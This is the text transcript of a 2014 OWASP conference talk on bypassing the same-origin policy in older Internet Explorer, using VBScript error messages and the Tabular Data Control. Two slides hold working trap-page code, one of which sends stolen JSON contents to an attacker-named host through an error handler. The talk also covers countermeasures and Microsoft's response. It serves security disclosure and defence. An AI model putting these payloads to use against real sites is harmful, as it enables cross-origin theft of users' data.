Download as PDF, PPTX
![VBScript Error Msg
Reading JSON as VBScript src
fail → raises exception
// Trap page by attacker
<script
src="http://example.jp/target.json"
language="vbscript">
</script>
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[ "secret", "data", "is", "here" ]](https://image.slidesharecdn.com/owasp-hasegawa-140319222239-phpapp01/85/Bypass-SOP-Theft-Your-Data-XSS-Allstars-from-Japan-OWASP-AppSec-APAC-2014-6-320.jpg)
![Countermeasure
Countermeasure
add "X-Content-Type-Options:nosniff"
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
[ "secret", "data", "is", "here" ]](https://image.slidesharecdn.com/owasp-hasegawa-140319222239-phpapp01/85/Bypass-SOP-Theft-Your-Data-XSS-Allstars-from-Japan-OWASP-AppSec-APAC-2014-8-320.jpg)
![[Wroclaw #2] Web Application Security Headers](https://cdn.slidesharecdn.com/ss_thumbnails/owaspwebapplicationsecurityheaders1-160429210343-thumbnail.jpg?width=640&height=640&fit=bounds)
![[デブサミ2012]趣味と実益の脆弱性発見](https://cdn.slidesharecdn.com/ss_thumbnails/devsumi-hasegawa-120216203637-phpapp01-thumbnail.jpg?width=640&height=640&fit=bounds)
Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
- 1. Bypass SOP, Theftyour data - XSS Allstars from Japan - Yosuke HASEGAWA
- 2. About Me Yosuke HASEGAWA@hasegawayosuke Engineer of NetAgent Co.,Ltd. Secure Sky Technology Inc. technical adviser http://utf-8.jp/ author of jjencode, aaencode, ... OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member
- 3. Agenda Cross-Origin information disclosure NotXSS, but bypass SOP Introduce 2 ways for modern IE VBScript Error msg Tabular Data Control
- 4.
- 5. VBScript Error Msg VBScriptError Msg Target: IE9-10 (IE6-8 are safe, wow!) Reading JSON Array as VBScript on trap page created by attacker VBScript raises exception with error message including JSON content JavaScript can access to JSON content via error message
- 6. VBScript Error Msg ReadingJSON as VBScript src fail → raises exception // Trap page by attacker <script src="http://example.jp/target.json" language="vbscript"> </script> HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 [ "secret", "data", "is", "here" ]
- 7. VBScript Error Msg catcherror msg with error handler GET http://attacker.utf-8.jp/log?Type%20mismatch:%20' %20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1 Referer: http://attacker.utf-8.jp/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) <script> window.onerror = function( e ){ document.getElementById( "img" ).setAttribute( "src", "http://attacker.utf-8.jp/log?" + e ); } </script> <script src="http://example.jp/target.json" language="vbscript"></script>
- 8. Countermeasure Countermeasure add "X-Content-Type-Options:nosniff" HTTP/1.1 200OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff [ "secret", "data", "is", "here" ]
- 9. VBScript Error Msg supplementary supplementary Dec2012: reported to MS by me and @masa141421356 May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not. "Add X-C-T-O header for IE9-11 to prevent from this attack, this is BEHAVIOR BY DESIGIN" they said.
- 10.
- 11. Tabular Data Control TabularData Control - TDC ActiveX Control for binding text file into HTML as data table http://msdn.microsoft.com/en-us/library/ms531356.aspx Enabled by default on IE6-IE11, with older doc-mode <meta http-equiv="x-ua-compatible" content="IE=10"> Spotlighted by Cure53 X-Mas Challenge https://cure53.de/xmas2013/ https://cure53.de/xmas2013/writeup The winner is @kinugawamasato
- 12. Tabular Data Control //Trap page by attacker on attacker.utf-8.jp function show(){ var s = document.getElementById("tdc") .recordset.getString(); alert( s ); } ... <meta http-equiv="x-ua-compatible" content="IE=10" > <object id="tdc" ondatasetcomplete="show()" classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"> <param name="DataURL" value="http://example.jp/target.txt"> </object> //target page included secret data on example.jp/target.txt Content-Type: application/octet-stream Content-Disposition: attachment; filename=bindata X-Content-Type-Options: nosniff @!allow_domains=attacker.utf-8.jp secret,data,is,here
- 13. Tabular Data Control Attackerhas to insert "@!allow_domains=..." into the top of target text Once inserted, no way to prevent from theft Unhelpful: X-Content-Type-Options: nosniff Content-Disposition: attachment
- 14. Countermeasure Countermeasure Restrict access toXHR request with custom X header and / or... var xhr = new XMLHttpRequest(); xhr.open( "GET", "http://example.jp/target.txt", true ); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.send( null ); GET /target.json HTTP/1.1 Host: example.jp User-Agent: Mozilla/5.0… Accept: */* X-Requested-With: XMLHttpRequest
- 15. Countermeasure(cont.) Countermeasure (cont.) Don't allowto place text by attacker into top of the content //target page included secret data on example.jp/target.txt Content-Type: application/octet-stream Content-Disposition: attachment; filename=bindata X-Content-Type-Options: nosniff @!allow_domains=attacker.utf-8.jp secret,data,is,here
- 16.
- 17. Conclusion Conclusion IE has funnybehavior even now Add X-Content-Type-Options for all resources Restrict access to XHR with custom X- header
- 18.